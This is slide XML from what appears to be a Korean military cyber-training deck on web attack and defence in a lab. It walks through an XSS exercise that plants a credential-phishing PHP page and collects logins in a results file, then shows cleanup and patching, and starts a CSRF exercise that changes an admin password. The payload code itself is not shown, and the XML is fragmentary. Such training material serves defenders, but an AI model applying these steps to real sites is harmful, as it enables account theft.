                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: /var/www/xssattack.txt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탐지하고 대응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E68EE656-116A-4575-9320-CD1FD43D18C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6776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공격자는 피해 웹페이지에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XSS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취약점 공격을 실행한다</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/var/www/</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밑에 파일들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cd /var/www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ls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pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="_x926658296">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79DA57B4-D320-4843-91F0-1384300E8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134836"/>
            <a:ext cx="5400675" cy="584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_x926656712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E0BA8B-8841-46FB-AA4E-C33B96FC8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633436"/>
            <a:ext cx="5400675" cy="6889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926661176">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68EE07CF-E9AA-4128-97CE-DE2076A3A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17445"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3779611"/>
            <a:ext cx="5400675" cy="1057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B9329925-4819-4789-BB2A-81A4244FB1DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="21762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2) localhost</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가 사용되는 웹 서버 기본 파일 위치를 파악하고 공격에 사용할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php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파일을 이동</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cp ./getlogininfo.php ./html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&lt; getlogininfo.php -&gt;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로그인 시 계정을 피싱하는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php&gt;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cp ./member_login.php ./html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&lt;member_login.php -&gt;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로그인 폼</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php&gt;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DD75D0FB-E062-405F-B9CC-28A44AC1282F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="33224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3)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사용할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xss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스크립트 내용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vi xssattack.txt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0" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8538B2A-63F7-4B90-B7F9-13B886C08F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="4261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4)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브라우저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iceweasel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프로그램 실행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1031" name="_x106415376">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD4C741-3919-4062-B50E-52A540C1D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17329"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="883309"/>
            <a:ext cx="5400675" cy="20701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FB524D4-2A7E-47A3-A591-CF35DD4CA84A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="30454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5)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인터넷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url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창에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http://web.navy.mil.kr/webhack</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를 입력하여 피해 서버에 접속</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1033" name="_x925650632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F3A0B5D-6771-4F6B-97EB-630009BB09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7730" y="3502676"/>
            <a:ext cx="5400675" cy="277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04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666546"/>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a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>대위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>나이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: 28</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>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a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>교수부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>이학처</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 사이버과학과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>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014" y="1824575"/>
            <a:ext cx="1287541" cy="1655410"/>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AA81B6A5-057E-4ECB-9CBB-3A1898D096C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="473529" y="44966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6) http://web.navy.mil.kr/webhack/Guestboard</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에 들어가기</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2049" name="_x106415520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DCF8DC-2F2B-4188-8F71-654FE9421B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29" y="906862"/>
            <a:ext cx="5400675" cy="35623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64148329-1AF8-442C-AD30-132DDAD95959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6183088" y="7529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7)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게시글 생성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계정</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ID: ltest01 Password: test01</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Email: test01@hack.mil.kr</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Subject: attack</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Contents : /var/www/xssattack.txt</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내용</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2051" name="_x106417680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E35ACD9-FE91-44D6-9C51-54FC26EFCC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0" t="3410" r="6000" b="4547"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6183088" y="1210137"/>
            <a:ext cx="4751388" cy="360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1995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76418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9B13B75B-F62D-426E-9AD1-186157679084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="392120" y="6123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8)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게시글 위치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악의적인 게시글이 있는 게시판에서 마우스 오른쪽 클릭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Copy link location</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3073" name="_x106415088">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC05E2B4-3196-4AA6-898D-09DF7EDC2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20" y="1069522"/>
            <a:ext cx="5400675" cy="27320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60A22C68-31B4-4018-80DE-0C2F3F46A050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="473529" y="40669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9) admin/lab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로그인 후 공격 게시글에 접근 후 공격 성공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재 로그인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id;admin pw lab</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="_x106416312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5FF27A-7106-4E4A-A0A2-3F4F0C21E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2816" t="12424" r="10594" b="27367"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="473529" y="4524134"/>
            <a:ext cx="2695575" cy="12112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65D21708-4F83-4C13-9935-1ED79C941EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="48169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vi /var/www/phishing-result.txt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파일에 로그인 정보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3079" name="_x106415448">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA63D7BA-F0BF-4D05-923C-9F82E378FC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7730" y="938893"/>
            <a:ext cx="5400675" cy="7715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86171C6-2745-44E2-B88C-FF61E058E1E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="2376502"/>
            <a:ext cx="5616792" cy="4112495"/>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9" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BE5944-97BD-4F34-956A-F6554F4D2104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369660" y="2889859"/>
            <a:ext cx="5113020" cy="75431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7148723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/Training/Unit/Web/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 8. XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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귀하의 피해 서버는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통해 특정 게시글에 접근하면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. id/password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>값을 갈취당하는 피해가 나타났다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이때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하고 있는 게시글을 웹 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에 접근하여 찾아 삭제하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, XSS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취약점에 대해 대응하여라</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mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>접근 방법</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: mysql –u root –p </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게시글 파일 위치 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>:         	/var/www/html/webhack/board/board_write_ok.php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탐지하고 대응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304872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_x106417824">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F82071F-9D99-4D51-87EE-AE9A8A24C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57" y="1126795"/>
            <a:ext cx="5400675" cy="2239963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4097" name="_x106417392">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{838E1D24-8DD4-425E-AF86-1518BF15C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57" y="3823958"/>
            <a:ext cx="5400675" cy="9540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9EC8025C-A24C-48DD-94A9-5A9214E39CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489857" y="6695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mysql –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"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u root –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"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로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DB</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에 접근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mysql -u root -p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&gt; lab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9A069C42-B55A-4451-A397-F8BE876CD4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489857" y="33667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2)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테이블에서 악의적인 행위가 들어있는 게시글 확인</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&gt; use webhack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&gt; select * from board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4488C6F3-577E-4D7B-A53D-82E581C0CED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489857" y="42943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4101" name="_x106414512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E01E188-3115-4E88-A952-CCBCB29AC2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857" y="4751549"/>
            <a:ext cx="5400675" cy="1660525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4104" name="_x106414512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1595B7C-1543-4AE8-A21C-CCA7509281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3843" y="860095"/>
            <a:ext cx="5400675" cy="38893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106418832">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6A99D9-6F34-4718-B7D6-3B3FC75DE4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3843" y="1869513"/>
            <a:ext cx="3932238" cy="3889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F1E19D4-D33D-43F0-839F-26D15AFD81BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6253843" y="4028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3)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페이지 접속 후 악의적인 게시글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583E9C73-23AE-463B-8EB5-DD23B6BE2DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6253843" y="14123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1"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r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1000" b="1"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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1000" b="1"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r>
              <a:rPr kumimoji="0" lang="en-US"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 </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mysql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접속 후 해당 테이블 삭제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&gt; delete from board where strNumber ="75";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Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F97A355F-3121-433D-8BA9-80FDB1F3A1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6253843" y="23954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2)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페이지 게시글 업로드 되는 웹 소스 수정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vi var/www/html/webhack/board/board_write_ok.php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pic>
        <p:nvPicPr>
          <p:cNvPr id="4107" name="_x106415160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9691F2-F35E-4BA6-B673-41F1A21952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1468" y="2844801"/>
            <a:ext cx="5400675" cy="316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99181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5985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134B9F08-58FE-4DF5-854E-82F237584E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="473529" y="69396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3)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서비스 재시작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service httpd restart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service mysqld restart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(mysql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변경이 있으므로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mysqld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서비스도 재시작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pic>
        <p:nvPicPr>
          <p:cNvPr id="5121" name="_x106418256">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EE4B3D-6134-4410-A258-FE519F537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29" y="1151164"/>
            <a:ext cx="5400675" cy="6540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1CD56F-666B-4278-A0FD-1A883B875B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="2387588"/>
            <a:ext cx="5616792" cy="4112495"/>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2" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48EB20A5-0819-492D-A96F-C4481AFD0846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="578694" y="2900945"/>
            <a:ext cx="5113020" cy="75431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37793098"/>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/Training/Unit/Web/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. 3.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>크로스 사이트 요청변조</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공격자는 현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>CSRF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코드를 업로드 하고 실행할 수 있는 취약점 서버를 확인 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 취약점에 대한 코드를 게시 글에 업로드 하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>으로 계정 로그인 하여</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게시글에 접근해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 비밀번호를 변조하여라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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피해 웹 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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csrf  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소스 위치 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: /root/csrf.txt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admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>계정 정보 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: admin / lab</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CSRF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탐지하고 대응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521138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A3B14FFC-FD71-4870-8229-61E5E3BF7835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489858" y="6041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CSRF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공격을 할 소스를 수정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피해 웹 서버</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http://web.navy.mil.kr/webhack</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vi /root/csrf.txt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pic>
        <p:nvPicPr>
          <p:cNvPr id="6145" name="_x926273848">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
